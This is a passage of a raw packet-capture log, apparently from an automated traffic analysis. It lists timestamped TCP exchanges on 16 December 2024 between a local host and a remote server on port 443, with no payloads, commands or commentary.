                                                                                                              Dec 16, 2024 09:14:20.761296034 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.761327028 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.761334896 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.773196936 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.773238897 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.773282051 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.773288012 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.773319006 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.773341894 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.783088923 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.783133984 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.783185005 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.783190966 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.783236980 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.794600964 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.794642925 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.794670105 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.794676065 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.794708014 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.794734955 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.802541971 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.802598953 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.802648067 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.802654982 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.802695036 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.808290958 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.808347940 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.808387041 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.808393002 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.808439016 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.808446884 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.842025042 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.842068911 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.842109919 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.842116117 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.842155933 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.937087059 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.937134027 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.937217951 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.937228918 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.937347889 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.942873001 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.942914963 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.942938089 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.942944050 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.942974091 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.942985058 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.948827028 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.948868036 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.948890924 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.948896885 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.948934078 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.948952913 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.954061985 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.954121113 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.954153061 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.954159021 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.954188108 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.954206944 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.960026026 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.960066080 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.960095882 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.960102081 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.960129976 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.960150003 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.985919952 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.986013889 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.986042976 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.986051083 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.986087084 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.986095905 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.991424084 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.991472006 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.991513014 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.991518974 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:20.991554976 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:20.991573095 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.034053087 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.034125090 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.034140110 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.034173012 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.034235001 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.034235001 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.138276100 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.138324976 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.138355970 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.138362885 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.138395071 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.138407946 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.143352985 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.143377066 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.143416882 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.143424988 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.143459082 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.143475056 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.149303913 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.149328947 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.149363995 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.149370909 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.149404049 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.149418116 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.155189037 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.155209064 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.155249119 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.155256033 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.155287027 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.155302048 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.160868883 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.160892010 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.160921097 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.160928011 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.160964966 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.160984039 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.178164959 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.178220987 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.178245068 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.178252935 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.178277969 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.178292990 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.184076071 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.184119940 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.184324980 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.184331894 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.184767008 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.226059914 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.226089954 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.226139069 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.226146936 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.226214886 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.226237059 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.322274923 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.322335958 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.322377920 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.322392941 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.322421074 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.322436094 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.328051090 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.328075886 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.328135967 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.328144073 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.331967115 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.333257914 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.333285093 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.333368063 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.333375931 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.335779905 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.339082003 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.339102983 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.339170933 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.339176893 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.340028048 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.345048904 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.345071077 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.345138073 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.345150948 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.347887993 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.370522022 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.370565891 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.370739937 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.370739937 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.370748043 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.371972084 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.375921011 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.375971079 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.375998974 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.376007080 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.376035929 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.376048088 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.418313026 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.418348074 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.418549061 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.418555975 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.418597937 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.514163971 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.514189005 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.514234066 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.514256001 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.514269114 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.514292955 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.520081997 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.520103931 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.520164013 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.520170927 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.520210028 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.528189898 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.528211117 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.528276920 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.528283119 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.528318882 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.528337002 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.531160116 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.531181097 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.531229973 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.531235933 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.531260014 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.531279087 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.537146091 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.537170887 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.537221909 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.537228107 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.537262917 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.537283897 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.537581921 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.563393116 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.563456059 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.563462019 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.563488960 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.563517094 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.563534021 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.568752050 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.568799019 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.568835020 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.568841934 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.568852901 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.568876982 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.610588074 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.610640049 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.610688925 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.610697031 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.610740900 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.707492113 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.707540035 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.707571983 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.707582951 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.707609892 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.707621098 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.712851048 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.712896109 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.712939024 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.712944984 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.712958097 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.712980986 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.718272924 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.718317032 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.718342066 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.718348026 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.718502045 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.718502045 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.724104881 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.724145889 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.724169016 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.724174976 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.724201918 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.724209070 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.729893923 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.729933977 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.729964972 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.729970932 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.729989052 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.730012894 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.756004095 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.756048918 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.756150007 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.756150007 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.756158113 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.756196022 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.760970116 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.761012077 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.761034966 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.761040926 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.761065960 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.761085033 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.802670002 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.802715063 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.802747965 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.802753925 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.802783966 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.802795887 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.898610115 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.898653030 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.898683071 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.898690939 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.898715019 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.898730993 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.904458046 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.904498100 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.904536963 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.904542923 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.904582977 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.904601097 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.909701109 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.909744024 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.909784079 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.909790039 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.909827948 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.909847975 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.915674925 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.915718079 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.915760994 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.915767908 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.915798903 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.915812969 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.921550989 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.921591997 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.921636105 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.921643019 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.921669006 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.921689034 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.947417021 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.947500944 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.947523117 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.947530031 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.947562933 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.947585106 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.952421904 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.952445030 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.952481985 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.952490091 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.952527046 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.952538967 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.994875908 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.994930983 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.994967937 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:21.994976044 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:21.995018959 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:22.091038942 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:22.091085911 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:22.091135025 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:22.091141939 CET4434973662.182.21.105192.168.2.4
                                                                                                              Dec 16, 2024 09:14:22.091178894 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:22.091192961 CET49736443192.168.2.462.182.21.105
                                                                                                              Dec 16, 2024 09:14:22.096787930 CET4434973662.182.21.105192.168.2.4
